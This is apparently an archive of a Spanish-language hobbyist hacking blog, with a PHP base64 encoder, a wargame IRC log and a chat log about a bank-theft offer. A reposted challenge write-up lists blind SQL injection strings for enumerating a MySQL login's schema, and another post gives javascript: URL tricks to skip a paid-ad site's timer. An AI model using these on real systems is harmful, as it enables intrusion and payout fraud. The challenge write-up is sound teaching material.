#n3ur0n4 c0rp | silicon cell into your mind

Jun/10

25

x.25sec Conferences

0 Comments | Posted by @135747 in Eventos, Mis Noticias, México, hack

posters-r

El Centro de Estudios Superiores en Alta tecnología en coordinación con la Asociación Latinoamericana de Especialistas en Seguridad Informática (ALAPSI) a través del CCAT Research Labs, organizan el primer:

“X.25 Ethical Hacking Conferences”

Uno de los principales eventos en Latinoamérica relacionado con la seguridad informática.

El “X.25 Ethical Hacking Conferences” permitirá reunir a investigadores reconocidos a nivel nacional y mundial quienes compartirán las nuevas tendencias de la seguridad informática a un nivel totalmente técnico quienes son provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado e investigadores que por su propia cuenta han hecho descubrimientos en cuestión de seguridad informática se refiere.

Este evento se dividirá en dos etapas: los talleres de Especialización enfocados a capacitar en las principales áreas de Seguridad Informática, y el ciclo de Conferencias impartidas por reconocidos expertos que serán invitados a este magno evento para compartir sus últimas investigaciones y experiencias en el área.

Las Conferencias y los talleres de Seguridad Informática se llevarán a cabo del

22 al 23 de Octubre del 2010

Sede: Xalapa, Ver. México

Para mayores informes: x.25sec

, , ,

Apr/10

1

Regresando a wordpress!!!

2 Comments | Posted by @135747 in n3ur0n4

A críticas y peticiones de mi amigo hdstryOwrld he decidido regresar a wordpress…

Las palabras de hdstryOwrld fueron las siguientes:

“el nuevo diseño se ve muy bien solo que se ve algo estático, es decir pensé que era puro código HTML, cualquiera que entre se le ha de hacer muy difícil navegar, al igual que a mí en un principio.”

Así lo recuerdo :S y en verdad me hizo pensar dichas observaciones, a mi parecer el n3ur0n4 file system 1.0 me agrado mucho no se a ustedes, y viéndole del lado del usuario en verdad da la cara de que es estático, además de que aun no desarrollaba la opción de poder opinar acerca de las publicaciones.

Es por eso que les dejo la anterior n3ur0n4 en wordpress y espero me disculpen por lo que pueda causar este cambio.

Las publicaciones nuevas después de bux[dot]to que publique en el n3ur0n4 file system aca dejo los links:

http://n3ur0n4.org/yashira20091112-13.html

http://n3ur0n4.org/bancos-log.html

http://n3ur0n4.org/mysql_information_schema-by-jde.html

http://n3ur0n4.org/algoritmo_codificar_base64-php.html

También les dejo el wallpaper oficial de n3ur0n4 cuando aun éramos un foro (al puro estilo de matrix).

n3ur0n4.org

Mar/10

12

algoritmo_codificar_base64.php

0 Comments | Posted by @135747 in PHP, scripts

Un cordial saludo a todos los programadores expertos y aficionados, hace un par de días encontré un artículo de CrashCool en un ahora extinto foro hackxcrack, trata de el algoritmo a seguir para pasar cualquier texto a base64.

Ya que muchos usamos funciones para codificar en tal base sin embargo muchos no se preocupan por el funcionamiento detrás de esas funciones. Así que tome como ejercicio de programación el base64_encode().

Publicado: Domingo, 26 Octubre 2003, 01:34 Título del mensaje: Codificando base64 (+Prog. en Java)

“Explicación del algoritmo

Partimos de que cada letra tiene su valor ASCII, un ejemplo que todos conoceréis es el símbolo ~ que equivale a 126, dicho esto prosigo.

Funcionamiento del algoritmo


-1º Se coge el valor ASCII de cada carácter de texto (en decimal) y lo pasamos a binario con 8 bits, formando así una cadena con el código binario de todas las letras del texto a codificar.


-2º Una vez obtenida dicha cadena ej. 10010100 00110100 11001010

se divide en cadenas de 6 bits (de izq. a derecha), con lo cual dividiremos la longitud de la cadena entre 6, como estarás pensando, la división no siempre saldrá exacta con lo cual rellenaremos con 0 el grupo de 6 bits de la derecha hasta completar 6.


-3º Una vez obtenidos los grupos de 6 bits, pasamos estos grupos de binario a decimal, con lo cual obtendremos un numero (obligatoriamente comprendido entre 0 y 64), ahora cogemos la tabla de caracteres de b64 comprendida entre [A-Z][a-z][0-9][+,/] y miramos en la tabla el número que le corresponde:

Valor Codificación Valor Cod. Valor Cod. Valor Cod.

0 A___ 17 R___ 34 i___ 51 z

1 B___ 18 S___ 35 j___ 52 0

2 C___ 19 T___ 36 k___ 53 1

3 D___ 20 U ___ 37 l___ 54 2

4 E___ 21 V___ 38 m___ 55 3

5 F___ 22 W___ 39 n___ 56 4

6 G___ 23 X___ 40 o___ 57 5

7 H___ 24 Y___ 41 p___ 58 6

8 I___ 25 Z___ 42 q___ 59 7

9 J___ 26 a___ 43 r___ 60 8

10 K___ 27 b___ 44 s___ 61 9

11 L___ 28 c___ 45 t ___ 62 +

12 M___ 29 d___ 46 u ___ 63 /

13 N___ 30 e___ 47 v___

14 O___ 31 f___ 48 w___ (relleno) =

15 P___ 32 g___ 49 x___

16 Q___ 33 h___ 50 y___

-4ºUna vez obtenida la cadena en b64 contamos los caracteres q la forman y comprobamos q el resto de dividirla entre 4 es 0, en caso contrario añadiremos tantos símbolos de relleno “=” como hagan falta para conseguir esta divisibilidad , imaginad q la cadena q nos sale es de 15 caracteres, en este caso le añadiríamos al final el carácter ‘=’ con lo cual la longitud ahora es 16 (divisible entre 4).”

Bueno eso es todo por parte de CrashCool después nos brinda el algoritmo de un codificador en java pero solo lo teórico es lo que nos importa por ahora ya que crearemos nuestro propio algoritmo.

Algoritmo

Todos los que usamos PHP como lenguaje de base para nuestras plataformas web conocemos la función base64_encode() que traduce a base64 cualquier string que le pasemos como parámetro. Sin embargo pocos sabemos nos damos a la tarea de saber que hay detrás de dicha función. Vamos por decirlo así: “que hay bajo la falda de la señorita base64_encode() XD.

Ahora después de conocer el algoritmo por el que se rige el base64 nos podemos dar a la tarea de lograr nuestra propia función base64_encode() a la cual llamare str_b64() y el lenguaje de desarrollo ustedes lo eligen, yo elegí PHP.

Sin más jerga les dejo mi código espero les ayude a comprender el algoritmo antes citado por CrashCool.

  1. <?
  2. /*===============================================
  3. * function str_b64 ($text):
  4. * by: Lestat de Lioncourt
  5. * to: http://n3ur0n4.org
  6. * reply to: lestat[at]n3ur0n4[dot]org
  7. * algoritmo para la generacion de una cadena en
  8. * base64 a partir de un texto dado por la llamada
  9. * a dicha funcion.
  10. * algoritmo de la funcion base64_encode()
  11. ===============================================*/
  12. $cadena = "str_b64 by Lestat de Lioncourt to n3ur0n4.org.";
  13. echo str_b64($cadena);
  14. echo "<br />".base64_encode($cadena);
  15. function str_b64 ($text) {
  16. /*===============================================
  17. * declaramos el array de caracteres de base 64
  18. * consta de 64 caracteres 0 -- 63.
  19. =================================================*/
  20. $b64chr = array ('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
  21. 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
  22. 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
  23. 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/');
  24. /*===============================================*/
  25. /*===============================================
  26. * paso 1: convertimos a binario cada caracter de la
  27. * cadena y lo guardamos en una cadena auxiliar
  28. * llamada $binstring (cadena en binario).
  29. =================================================*/
  30. for ($x = 0; $x < strlen($text); $x++) {
  31. $binstring .= atob ($text[$x]);
  32. }
  33. /*=================fin paso 1====================*/
  34. /*===============================================
  35. * paso 2: una vez obtenido el binario del texto
  36. * a convertir, generamos sexetos del binario
  37. * no siempre tendremos sexetos enteros al final
  38. * es desir "000000" en caso de lo contrario se
  39. * rellenara con "0" el ultimo sexeto hasta completarlo
  40. * los sexetos obtenidos los guardamos en un arreglo
  41. * para su mejor manipulacion en el sig. paso.
  42. =================================================*/
  43. $i = 0;
  44. while ($i < strlen($binstring)) {
  45. if (strlen(substr($binstring,$i,6)) == 6) {
  46. # obtenemos nuesto sexeto y lo guardamos en el arreglo $sexetos[]
  47. $sexetos[] = substr($binstring,$i,6);
  48. } else {
  49. /* si el sexeto no es entero rellenamos por obiedad esto siempre pasa en el ultimo sexeto */
  50. $sexeto = substr($binstring,$i,6);
  51. while (strlen($sexeto) < 6) {
  52. $sexeto .= "0";
  53. }
  54. $sexetos[] = $sexeto;
  55. }
  56. $i+=6;
  57. }
  58. /*=================fin paso 2====================*/
  59. /*===============================================
  60. * paso 3: una vez obtenidos los sexetos los
  61. * convertimos a su respectivo desimal, obteniendo
  62. * asi nuemenos que van de [0-63] para compararlos
  63. * uno a uno contra la tabla de caracteres base64
  64. =================================================*/
  65. foreach ($sexetos as $pr) {
  66. $b64string .= $b64chr[btod($pr)];
  67. }
  68. /*=================fin paso 3====================*/
  69. /*===============================================
  70. * paso 4: la divicion de la longitud de la cadena
  71. * entre cuaatro deve dar como resultado un modulo
  72. * igual a 0 (cero) de lo contrario se añadira un
  73. * caracter de relleno (=) al final de la cadena
  74. * hasta lograr un modulo igual a 0.
  75. =================================================*/
  76. while((strlen($b64string)%4) != 0) {
  77. $b64string .= "=";
  78. }
  79. /*=================fin paso 4====================*/
  80. return $b64string;
  81. }
  82. /*===============================================*/
  83. ###################################################
  84. # funciones auxiliares
  85. ###################################################
  86. /*===============================================
  87. * atob (alphabetic to binary):
  88. * dado un caracter alfanumerico generamos su
  89. * correspondiente octeto en binario
  90. =================================================*/
  91. function atob ($chr) {
  92. $num = ord($chr);
  93. $i = 0;
  94. // el metodo para la convercion de desimal a binario dicta si hay resto entonces da un alto "1" si no hay resto un bajo "0"
  95. while ($num > 0){
  96. if ($num%2==1) {
  97. $bin[$i++] = $num % 2;
  98. $num = ($num -- 1) / 2;
  99. } else {
  100. $bin[$i++] = $num % 2;
  101. $num = $num / 2;
  102. }
  103. }
  104. // completamos los 8 bits
  105. if ($i < 8) {
  106. do {
  107. $bin[$i++] = 0;
  108. } while ($i < 8);
  109. }
  110. // todos los que saben convertir a binario sabemos que despues de realizar
  111. // nuestras operaciones para determinar los 0 y 1 del nuemero en cuestion
  112. // devemos leer de manera inversa los resultados (de deracha a izquierda,
  113. // de abajo hacia arriba, etc). asi que invertimos nuestro arreglo $bin
  114. // y lo concatenamos en una cadena de ocho caracteres que retornaremos.
  115. while ($i >= 0){
  116. $cadena .= $bin[$i--];
  117. }
  118. return $cadena;
  119. }
  120. /*===============================================*/
  121. /*===============================================
  122. * btod (binary to decimal):
  123. * el octeto en bonario lo convertimos a desimal
  124. * bajo el metodo de posicion, es desir, nuestro bit
  125. * binario multiplicado por la base 2 elevada a la
  126. * potencia de su pocicion y sumadas entre si.
  127. * ejemplo: 1011
  128. * (1*2^3)+(0*2^2)+(1*2^1)+(1*2^0) = 8 + 0 + 2 + 1 = 11
  129. =================================================*/
  130. function btod ($sbin) {
  131. $i = strlen($sbin)-1;
  132. $des = 0;
  133. $j = 0;
  134. while ($i >= 0) {
  135. $des += $sbin[$i--]*(pow(2,$j++));
  136. }
  137. return $des;
  138. }
  139. /*===============================================*/
  140. ?>

, , , ,

Feb/10

24

MySQL_INFORMATION_SCHEMA By jde

0 Comments | Posted by @135747 in Documentos, hack

Bueno después de no dejarles nada desde hace ya tiempo, les dejo este documento escrito por jde hace ya tiempo, la verdad le perdí el rastro a nuestro amigo jde, esto data de cuando aun n3ur0n4 pretendía ser un hack team allá en los canales de red-latina.

Sin mas tonterías que poner les dejo el documento…

======================================

Reto: Prueba de inyeccion SQL v3 by jde

—– —— — ——— — — — —

Hola muchachos/as aca estoy escribiendo un minituto del tercer reto que propuso emadicius sobre inyeccion sql, que despues de peliarlo un par de horas pudimos salir vencedores :P. El reto consistia en sacar la mayor cantidad informacion posible de la base de datos, es decir que base de datos era, el nombre de la DB, el nombre de la tabla, el nombre de sus campos y su tipos, jujuj bue vamos a ver que podemos hacer…. ;)

1) Aproximacion

Cargamos el reto en el navegador y vemos dos input que piden Usuario y Password, probamos metiendo unas inocentes comillitas por algun lado y si ponemos por ejemplo en Usuario:’p y en Password:’p , la base nos tira el siguiente error:

Error:

com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘u’ and pass=”p” at line 1

Por suerte pudimos robar un pedazo de la consulta :D. Ahora sabemos que la consulta es de la forma:

…’xxxxxx’ and pass=’yyyyyy’….

Donde las xxxxxx son el usuario ingresado y las yyyyyyy el password ingresado. Al saber esto ya podemos empezar a inyectar codigo SQL, y hacer esto de manera valida sin que se produscan errores de sintaxis. Bastaria con hacer que nuestros xxxxxxx e yyyyyyy sean por ejemplo de la forma:

xxxxxxx=’SSSSSSSSS and ”=’

yyyyyyy=’QQQQQQQQQ and ”=’

Donde SSSSS y QQQQ es codigo SQL. Ya que si remplazmos esto en lo que sabiamos quedaria algo como:

…’xxxxxx’ and pass=’yyyyyy’…. —-> …”SSSSSSSSS and ”=” and pass=”QQQQQQQQQ and ”=”….

Lo que no tiene errores de sintaxis, siempre y cuando sea coherente lo de SSSSS y lo de QQQQQQ.

Tambien ya sabes que se trata de una base de datos MySQL.

Es mas sabemos que es una MySQL >= 5.0.12 ya que al inyectar la funcion sleep() no nos tira error. Probemoslo con:

xxxxxxx=’ and sleep(10) and ”=’

y como password cualquier cosa…. vemos que no hay error :D.

2) Consiguiendo el nombre de la base de datos

Primero podemos probar si tenemos algo de suerte :P aunque no suelo tenerla :( a veces suele funcionar jejejeje, asi que probemos si existe una tabla con el nombre Usuarios, lo vamos a hacer con la subconsulta EXISTS de la siguiente forma: EXISTS(SELECT * FROM Usuarios). Es decir nuestro SSSSSS sera de igual a:

SSSSSSSS= and EXISTS(SELECT * FROM Usuarios) —-> xxxxxxx=’ and EXISTS(SELECT * FROM Usuarios) and ”=’

Como password no metemos nada y veamos que pasa….

Error:

com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Table ‘pruebahack.usuarios’ doesn’t exist

Error… =( no tuvimos suerte esta vez… ya que si la tabla hubiese existido no tendriamos error(suponiendo que tenia filas). Pero si miramos bien en realidad si tuvimos suerte porque el error nos esta diciendo que la tabla ‘pruebahack.usuarios’ no existe. Es decir ya conseguimos el nombre de la DB.

La base de datos se llama ‘pruebahack’.

3)Informacion interesante…

Navegando por dev.mysql.com llegue al Capitulo 22 del manual de referencia de MySQL 5.0, el cual trata sobre la base de datos de informacion INFORMATION_SCHEMA, la cual sabemos que existira ya que esta disponible en MySQL >= 5.0.2. Tambien podemos ver que esa base tiene una tabla que se llama TABLES :o y vemos tambien que tiene un cmapo TABLE_NAME :O!!! Entonces esta tablita la podriamos usar para tratar de averiguar el nombre de la tabla en cuestion….

Podriamos plantearnos hacer algo como:

SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=’pruebahack’ AND TABLE_NAME LIKE ‘%%’

Donde entre los %% tendriamos que ir poniendo algo inteligentemente de manera que podamos encontrar el nombre de alguna tabla, y luego ver si esa consulta devuelve algo mayor a 0…

Pero como podiramos hacer para saber que devuelve….recordando las bases de blind SQL Injection, pensamos si podriamos aplicar aca el mismo criterio…

Por suerte si podemos :D

por ejemplo, recordando los otros retos y metiendo como password yyyyyy=’ or 1=1 and ‘1′=’1

Tenemos que…..

OK!!

y si en cambio ponemos yyyyyy=’ or 1=0 and ‘1′=’1

tenemos….

Nada jajaja, recargamos la pagina no mas

Perfecto ya que eso es lo que necesitamos, es decir si la expresion que esta entre el or y el and es true, tenemos un OK, y si es false recargamos la pagina… :)


4)A la carga….

Con lo pensado en el punto anterior, y esperando tener un poco mas de surte ahora nos fijamos si existe una tabla que contenga la palabra Usuarios :P

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=’pruebahack’ AND TABLE_NAME LIKE ‘%Usuarios%’)>0 and ”=’

….Ok!!!! seeeee un poco de suerte al fin!!!

ahora probamos sacando un % a la vez y vemos que la tabla se llama %Usuarios

Ahora fue no me quedo mas que probar :P y por suerte luego de un par de intentos llegue a que la tabla se llamaba…. Tb_Usuarios

5)Ahora los parametros….

Usando inyecciones como la anterior podemos saber la cantidad de las columnas:

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=’Tb_Usuarios’)=3 and ”=’

Por el punto uno sabemos que una columna se llama pass, lo que podemos verificar inyectando:

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=’Tb_Usuarios’ and column_name=’pass’)=1 and ”=’

Que tal si probamos si existe una user??

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=’Tb_Usuarios’ and column_name=’user’)=1 and ”=’

jejeje estamos de suerte!! ;D

Recapitulemos, sabemos que tiene 3 columnas y ya conocemos 2… a esta tabla le podria faltar un Id ;)….probemos….

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=’Tb_Usuarios’ and column_name=’Id’)=1 and ”=’

Perfecto!!!

Ya tenemos la cantidad de columnas y los nombres, solo nos quedan sus tipos….

Lo cual lo hacemos de la misma forma jajajaj :D

Por ejemplo sospechamos que el campo pass y el user deven ser algo de CHAR, entonces probemos….

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=’pruebahack’ and column_name=’user’ and data_type LIKE ‘%CHAR%’)>0 and ”=’


yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=’pruebahack’ and column_name=’pass’ and data_type LIKE ‘%CHAR%’)>0 and ”=’

Y despues de ahi cambiando %CHAR% por VARCHAR nos damos cuenta que son VARCHAR :D…. pero de cuanto….

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=’pruebahack’ and column_name=’pass’ and CHARACTER_MAXIMUM_LENGTH LIKE ‘10′)>0 and ”=’

Y jugando con ese 10 y lo mismo con el campo user obtenemos que pass es VARCHAR(100) y user VARCHAR(50).

Solo queda el tipo del campo Id,lo cual sospechamos que es int y lo comprobamos asi ;)

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=’pruebahack’ and column_name=’Id’ and data_type LIKE ‘INT’)>0 and ”=’

Y listo!!!! Ya conseguimos toda la info, es un motor MySQL >= 5.0.12, la DB se llama ‘pruebahack’, y los campos son Id (INT), user (VARCHAR(50)) y pass (VARCHAR(100)).

6)Despedida…

Bueno este fue mi primer tuto, y espero que le sirva a alguno :P y avisenme de los errores que debe tener jajaja.

A su vez aprovecho este lugar para agradecerle a todo el grupo ya que me dejaron entrar y espero poder aprender mucho y compartir el conocimiento con ustedes, de manera que eoupo sea mejor en todos sus aspectos.

Saludos, jde.

, , , ,

Dec/09

23

Burlar Bux[dot]to, no esperar 30 segundos

1 Comment | Posted by @135747 in Documentos, trucos

============================

Title: Burlar Bux[dot]to
By: Lestat de Lioncourt
To: n3ur0n4.org
Reply: lestat@n3ur0n4.org
============================

Introducción:

Bux[dot]to es un sitio en el que te pagan 0.01 dollar por ver publicidad durante 30 segundos, al día antes podías visitar 10 sitios ahora oscilan entre los 20-40 aproximadamente también antes te pagaban al juntar 10 dollares a una cuenta alertpay de tu preferencia, pero ahora al ser mas sitios pues te pagan a los 50 dolares.

El tema a tratar el día de hoy es hacer algo para demorar menos esos 30 segundos, y en breve observaremos cual es la magia de no esperar tanto.

Flash de ideas:

Usando un poco el cerebro sabemos que hacer un contador en cuenta regresiva para una pagina es cuestión de código ejecutado en el cliente en este caso usar JavaScript, si ese ya saben el que sirve para poner bonitos nuestros sitios xD.

Ya sabiendo que necesitamos el uso de javascript pues podríamos acordarnos de un muy sonado truco de “no esperar la cuenta regresiva en rapidshare”, y el que no lo haya usado pues que pena…

Codex:

javascript:alert(c=0)

El anterior código por simple que parezca es el encargado de retrasar el tiempo a 0 en las descargas de rapidshare. Ya que modifica el valor de la variable “c”, que es la encargada de llevar la cuenta regresiva para que nos deje realizar la descarga.

Manos a la obra:

Ahora manos a la obra demos una mirada al código de una de esos anuncios que nos vemos forzados a dejar abiertos 30 segundos solo por unas monedas xD.

Codex:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 
<script>
var x = 31;
var y = 1;
function startClock() {
        if (x !== 'Done') {
                x = x-y;
                document.frm.clock.value = x;
                setTimeout("startClock()", 1000);
        }
        if (x == 0) {
                x = 'Done';
                document.frm.clock.value = x;
                success.location.href="success.php";
        }
}
</script>

Excelente parece ser que no hemos errado en nuestro diagnostico. En el código anterior nos percatamos que existen dos variables:

  • x // encargada de guardar lo segundos restantes.

  • y // encargada de restar en unidad a nuestro contador.

Enseguida hagamos pruebas y juguemos con estas dos variables.

Todos los siguientes códigos se insertaran en la barra de direcciones de nuestro navegador web (borrando la dirección y pegando la linea javascript).

Codex:

javascript:alert(y=3)

El código anterior hará que nuestra espera sea reducida ya que el contador disminuirá ya no en una unidad si no restara tres unidades a la variable x.

Codex

javascript:alert(x=0)

Stop!!! que dijeron ya me jodí a bux[dot]to ¿verdad?, pues erraron si ponen la variable x a 0 el resultado de ese abuso de confianza los llevara a una cuenta infinita hacia los negativos, en pocas palabras y mejor entendibles “no te pagaran nunca esos 0.01 dollares” xD.

Codex

javascript:alert(x=1)

Tecleando el anterior código nos pondrá a uno la variable x y después de esto nos mostrara el hermoso DONE si corres con suerte seguido de una flecha que quiere decir que ya se ha pagado dicho enlace, su muestra un terrible tache (X) recarga la pagina y dele nuevamente al truco. Para no excedernos en dejar x=1 yo lo pongo a x=3, y casi siempre me da el DONE OK.

All

PD: Registrense en http://bux.to/

, , , , ,

Dec/09

15

bancos.log

0 Comments | Posted by @135747 in hack, logs

Log enviado por un anonimo, los nicks han sido cambiados a peticion de los participantes en el siguiente log.

Últimas frases en la conversación anterior :
[12/15/09 18:54:29 ] dangerX : defacers no creo
[12/15/09 18:54:36 ] dangerX : pero el zeus a de andar involucrado
[12/15/09 18:54:58 ] codefuck : pues alguno de ellos deve saber
[12/15/09 18:55:12 ] codefuck : bueno si me dan acceso ya te comunico
[12/15/09 18:55:25 ] dangerX : pues si consigues acceso lo rolas porfa
[12/15/09 18:55:34 ] dangerX : porque te digo que se desaparecio
[12/15/09 18:56:01 ] codefuck : ya veremos, si accedemos pues ke chingon
[Has cerrado la ventana a las 15 Dec 2009 18:56:03]

[18:56:36] dangerX se une a la conversación
[18:56:42] dangerX dice:
oye we y tu le mueves a cosas mas densillas
[18:57:06] codefuck dice:
no wey aun no tengo la capacidad
[18:57:13] dangerX dice:
carding, cluster hacking y cosas asi
[18:57:16] dangerX dice:
:(
[18:57:24] codefuck dice:
no no
[18:58:01] codefuck dice:
hace como un mes me contacto un tio para ke jodiera a banamex y bancomer pero no se xk acudieron a mi
[18:58:25] dangerX dice:
jajajaaj y no lo mandaste al carajo
[18:58:50] codefuck dice:
pues si, le dije ke era mucha lana ke no le entraba ni a putazos
[18:59:00] dangerX dice:
jajaajaja no mms
[18:59:05] dangerX dice:
no es por eso
[18:59:10] dangerX dice:
osea que te pidio?
[18:59:28] codefuck dice:
joder 3 cuentas
[18:59:42] codefuck dice:
en las cuales habia 230 millones de pesos
[18:59:58] dangerX dice:
y como lo ahrias?
[19:00:48] codefuck dice:
pues no se jaja es mucha lana ke no me deja pensar a gusto XD
[19:01:36] codefuck dice:
me trajo documentos de las cuentas
[19:01:43] codefuck dice:
ivamos a robar a un muerto
[19:01:47] dangerX dice:
jajajaaja olvidate de la lana
[19:01:49] codefuck dice:
XD
[19:01:50] dangerX dice:
como lo harias
[19:02:05] codefuck dice:
no se wey, no tengo el nivel necesario
[19:02:08] codefuck dice:
tu podrias?
[19:02:33] dangerX dice:
jajaj
[19:02:40] dangerX dice:
trabaje dentro de un banco
[19:02:43] dangerX dice:
se como funcionan
[19:02:50] dangerX dice:
y no me refiero a una sucursal
[19:02:54] dangerX dice:
sino al corporativo
[19:03:10] dangerX dice:
y eso es una cosa de pelicula
[19:03:16] dangerX dice:
no puedes hackear un banco
[19:03:45] codefuck dice:
kjaja pues asi esta el pedo
[19:03:49] dangerX dice:
:S, mi servidor hace ruido
[19:04:08] codefuck dice:
si robas a un muerto no aplica la ing social XDDD
[19:04:09] dangerX dice:
no me gusta si no estoy trabajando no deberia hacer ruido :S
[19:04:19] codefuck dice:
:S
[19:04:26] dangerX dice:
mmm no entiendes verdad
[19:04:35] dangerX dice:
a ver
[19:04:50] dangerX dice:
oh ya se
[19:04:53] dangerX dice:
viste firewall
[19:05:22] codefuck dice:
en cortos xk la compre pirata y la grabaron mal XD
[19:05:36] dangerX dice:
mmmta
[19:05:55] dangerX dice:
es buena la peli
[19:06:06] dangerX dice:
bueno ahi hay un entorno bancario
[19:06:15] dangerX dice:
medio chafa pero mas o menos
[19:06:37] codefuck dice:
aja
[19:06:39] dangerX dice:
el dinero sea de vivo o muerto esta en clusters de servidores
[19:07:05] codefuck dice:
si vi esa parte, continua
[19:07:06] dangerX dice:
y no puedes hacer transacciones bancarias a menos que estes en el nodo maestro de dicho cluster
[19:07:41] dangerX dice:
la mayoria de los bancos usan la base de datos mas cabrona, robusta, segura e hija de puta que conozco
[19:07:48] dangerX dice:
ORACLE
[19:08:00] dangerX dice:
programar para oracle es dificil
[19:08:20] dangerX dice:
imagina hackearlo
[19:09:05] codefuck dice:
si lo se, por eso dije ke era muy pendejo como para lograrlo
[19:09:12] codefuck dice:
XDD
[19:09:19] dangerX dice:
ahora este datacenter al menos en donde trabaje esta en el primer piso del edificio
[19:10:03] dangerX dice:
con 3 camaras en diferentes angulos, lector biometrico x rfid y con 1 guardia
[19:10:30] codefuck dice:
el guardia es lo de menos XD, lo demas si suena cabron
[19:11:30] Ocurrió un problema al enviar el siguiente mensaje:
el guardia es lo de menos XD, lo demas si suena cabron

, , , , ,

Dec/09

11

Log yashira 20091112-13

1 Comment | Posted by @135747 in logs

[20:19] == MCrow [i=c9725885@gateway/web/freenode/x-bsrboohjuazwxaun] has joined ##Yashira.org

[20:19] -ChanServ- [##Yashira.org] Bienvenido al Canal Oficial del WarGame Yashira

[20:23] <g30rg3_x> pues eso se tenia pensado

[20:23] <g30rg3_x> solo calidad de participantes

[20:24] <g30rg3_x> pero resulta que los buenos participantes no colaboran

[20:24] <g30rg3_x> xD

[20:38] <g30rg3_x> madres que aburridos son…

[20:38] <g30rg3_x> xD

[20:39] <GarraPata> yo toy tratando de resolver un reto

[20:43] <GarraPata> y no tengo tiempo de ligar contigo

[20:43] <g30rg3_x> si yo toy guapo =)

[20:43] <g30rg3_x> si quieres te ayudo x)

[20:44] <GarraPata> ajajaj toy tratando de hacer el de CriptoNightmare

[20:45] == djrams [i=be2a6699@gateway/web/freenode/x-duwakdqicsgrxgdn] has joined ##Yashira.org

[20:45] <djrams> hola

[20:45] <GarraPata> que tal djrams

[20:45] <djrams> amigos

[20:45] <GarraPata> eres nuevo no te habia visto

[20:45] <GarraPata> ?

[20:45] <djrams> bueno

[20:46] <djrams> si lo soy

[20:46] <djrams> recien me registre

[20:46] <djrams> bueno

[20:46] <g30rg3_x> una encuesta de calidad rapida..

[20:46] <djrams> estoy intentando

[20:46] <GarraPata> orale hechale ganas ponte a resolver retos para que llegues a ser tan bueno como yo

[20:46] <g30rg3_x> como te hubiera gustado registrarte a yashira

[20:46] <g30rg3_x> con o sin prueba?

[20:46] <djrams> pasar el reto de los metatags eso creo que tengo que estudiar sobre los headers de html algo asi

[20:46] <djrams> denme una sugerencia

[20:47] <g30rg3_x> numero de reto plz..

[20:47] <djrams> estoy baneado

[20:47] <djrams> hasta mañana

[20:47] <djrams> hice varios intento

[20:47] <djrams> s

[20:48] <g30rg3_x> el de charset?

[20:48] <djrams> era uno para arreglar las basuritas que aparecen en una pagina

[20:48] <djrams> mediante html

[20:48] <g30rg3_x> realmente si eres bueno

[20:48] <g30rg3_x> mejor dicho si te hubieras fijado bien

[20:48] <g30rg3_x> y das ver codigo fuente a yashira

[20:48] <g30rg3_x> rapido sale la respuesta ;)

[20:49] <GarraPata> cuantos años tienes djrams

[20:49] <g30rg3_x> bueno de hecho, no es igual xDDD

[20:49] <g30rg3_x> pero bueno solo cambias http-equiv por name y ya…

[20:49] <djrams> 18

[20:50] <djrams> ahya

[20:50] <g30rg3_x> no mas por que te conectaste al IRC

[20:50] <g30rg3_x> te voy a quitar el ban..

[20:50] <djrams> gracias te agradesco

[20:51] <g30rg3_x> listo

[20:51] <g30rg3_x> no mas no le digas a nadie ;)

[20:51] <djrams> ok esta bien mi estimado

[20:53] <djrams> ya veo Uste es el administrador de esta web creo que esta interesante

[20:54] <g30rg3_x> si, soy el unico que queda..

[21:01] <g30rg3_x> por que sera que nadie entiende sniffing 1

[21:02] <djrams> bueno a la pregunta de como me hubiera gustado registrarme a yashira bueno segun mi opinion para acoger a mas personas seria registrarse sin reto

[21:02] == GarraPata [i=bd9890cd@gateway/web/freenode/x-amxaaltyujszdugm] has quit ["Page closed"]

[21:02] == GarraPata [i=bd9890cd@gateway/web/freenode/x-goumztulzemdgnrr] has joined ##Yashira.org

[21:03] <g30rg3_x> MCrow: 66% vs 34%

[21:03] <djrams> pero yo me registre con reto hace 4 dias creo cuanod estaba en la escuela y despues se borro mi cuenta y ahora me registre de nuevo

[21:03] <g30rg3_x> xD

[21:03] <djrams> sin reto

[21:04] <g30rg3_x> cual te gusto mas

[21:04] <g30rg3_x> osea que te hubiera gustado que siga el reto o que se quite?

[21:05] <MCrow> ke siga

[21:06] <g30rg3_x> shhh MCrow, deja que opine Xd

[21:06] <MCrow> XD

[21:06] <djrams> creo que deben quitar ya cuando uno se registra y no pasa ninguna lo eliminan

[21:07] <djrams> al usuario

[21:07] <g30rg3_x> MCrow: 66% vs 34%

[21:07] <g30rg3_x> =)

[21:07] <MCrow> jaja

[21:07] <MCrow> bueno pasando a los retos

[21:08] <MCrow> tengo problemas con el zero zero killed

[21:08] <MCrow> segun yo es el lenguaje esoterico Ook

[21:08] <MCrow> asi ke me dia a la tarea de cambiar los 0 por Oo

[21:08] <MCrow> voy bien?

[21:09] <djrams> espero no causarles molestia pero les pregunto por que quitaron la prueba

